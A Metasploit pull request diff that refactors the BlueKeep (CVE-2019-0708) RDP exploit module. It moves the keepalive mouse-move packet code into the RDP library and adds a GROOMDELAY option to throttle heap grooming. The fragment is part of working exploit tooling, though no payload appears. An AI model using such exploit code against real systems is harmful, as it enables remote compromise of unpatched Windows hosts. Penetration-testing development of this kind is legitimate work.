### PR TITLE
move rdp_move_mouse to rdp library, add GROOMDELAY

### DIFF
--- a/lib/msf/core/exploit/rdp.rb
+++ b/lib/msf/core/exploit/rdp.rb
@@ -477,6 +477,15 @@ module Exploit::Remote::RDP
     rdp_send(rdp_build_pkt(pdu_client_font_list))
   end
 
+  def rdp_move_mouse(x = 1, y = 1)
+    mouse_move_blob = ""
+    mouse_move_blob << "\x04\x80\x0a"    # copypasta FAST PATH stuff from xfreerdp
+    mouse_move_blob << "\x20"            # TS_FP_INPUT_EVENT::eventHeader = 0x20 (FASTPATH_INPUT_EVENT_MOUSE)
+    mouse_move_blob << "\x00\x08"        # TS_FP_POINTER_EVENT::pointerFlags  = 0x0800 (PTRFLAGS_MOVE)
+    mouse_move_blob << [x, y].pack('vv') # TS_FP_POINTER_EVENT::xPos, TS_FP_POINTER_EVENT::yPos
+    rdp_send(mouse_move_blob)
+  end
+
   #
   # Protocol parsers
   #
@@ -1274,7 +1283,6 @@ protected
     result
   end
 
-
   def cs_core_data(
     version: 0x80004,
     width: 800,
@@ -1289,7 +1297,7 @@ protected
     client_product_id: 1,
     client_dig_product_id: "",
     selected_proto: 0
-  )
+    )
 
     client_name = Rex::Text.to_unicode(client_name[0..16], 'utf-16le')
     client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')

--- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
+++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
@@ -200,6 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
         OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
         OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
+        OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])
       ]
     )
   end
@@ -310,24 +311,23 @@ private
       # tasks we do every 1 MB
       if current_groom_count % (1024 / payloads.length) == 0
 
-        # injecting mouse move events keeps connection alive (groom > 30 seconds, such as over Internet/VPN)
-        mouse_move_pkt = ""
-        mouse_move_pkt << "\x04\x80\x0a"  # copypasta FAST PATH stuff from xfreerdp
-        mouse_move_pkt << "\x20"          # TS_FP_INPUT_EVENT::eventHeader = 0x20 (FASTPATH_INPUT_EVENT_MOUSE)
-        mouse_move_pkt << "\x00\x08"      # TS_FP_POINTER_EVENT::pointerFlags  = 0x0800 (PTRFLAGS_MOVE)
-        mouse_move_pkt << "\x01\x00"      # TS_FP_POINTER_EVENT::xPos = 1 (TODO: randomize?)
-        mouse_move_pkt << "\x01\x00"      # TS_FP_POINTER_EVENT::yPos = 1 (TODO: randomize? Make sure... does an off-screen coord still work?)
+        # adding mouse move events keeps the connection alive
+        # (this handles a groom duration > 30 seconds, such as over Internet/VPN)
+        rdp_move_mouse
 
-        rdp_send(mouse_move_pkt)
-
-        # uncomment to simulate crappy connection
-        #sleep 1
+        # simulate slow connection if GROOMDELAY is set
+        if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0
+          sleep(datastore['GROOMDELAY'])
+        end
 
         groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
         groom_elapsed_time = groom_current_time - groom_start_time
-        groom_elapsed_str = "%02d:%02d:%02d" % [groom_elapsed_time/3600, groom_elapsed_time/60%60, groom_elapsed_time%60]
+        groom_elapsed_str = "%02d:%02d:%02d" % [groom_elapsed_time / 3600,
+                                                groom_elapsed_time / 60%60,
+                                                groom_elapsed_time % 60]
 
-        vprint_status("Sent #{current_groom_count/(1024/payloads.length)+1}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})")
+        groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1
+        vprint_status("Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})")
       end
     end
 


### PR DESCRIPTION
This just tweaks https://github.com/rapid7/metasploit-framework/pull/12797 a bit, moving the mouse-move RDP code into the RDP library and parameterizing the slow-connection parameter.